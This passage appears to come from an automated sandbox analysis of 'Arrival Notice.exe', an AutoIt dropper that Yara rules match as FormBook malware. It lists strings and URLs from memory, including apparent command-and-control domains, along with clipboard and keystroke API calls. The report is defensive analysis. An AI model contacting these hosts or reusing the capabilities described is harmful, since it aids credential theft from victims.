72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: clip.exe, 00000003.00000002.4136624660.00000000060DC000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/px.js?ch=1
            Source: clip.exe, 00000003.00000002.4136624660.00000000060DC000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/px.js?ch=2
            Source: clip.exe, 00000003.00000002.4136624660.00000000060DC000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=UjNZQ0VuZmNSTGxudFk1ejYxKzNaQ0FiYW43cEtXaFhmSFFT
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4137645641.000000000564B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4137645641.000000000564B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000003.00000002.4136624660.00000000068B6000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000043C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: clip.exe, 00000003.00000002.4136624660.00000000068B6000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000043C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: clip.exe, 00000003.00000002.4136624660.00000000068B6000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000043C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000003.00000003.2036941200.00000000083DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/mediawiki.png
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: clip.exe, 00000003.00000002.4136624660.0000000005A94000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000035A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.0000000007C74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&amp;lH=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4136624660.0000000005A94000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000035A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.0000000007C74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0042EAFF
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0042ED6A
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0042EAFF
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0041AA57
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00449576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00449576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: Arrival Notice.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Arrival Notice.exe, 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ccb4cfd7-6
            Source: Arrival Notice.exe, 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1c31a8d2-6
            Source: Arrival Notice.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f2fe89ab-0
            Source: Arrival Notice.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5f596e73-2
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Arrival Notice.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042AFF3 NtClose,1_2_0042AFF3
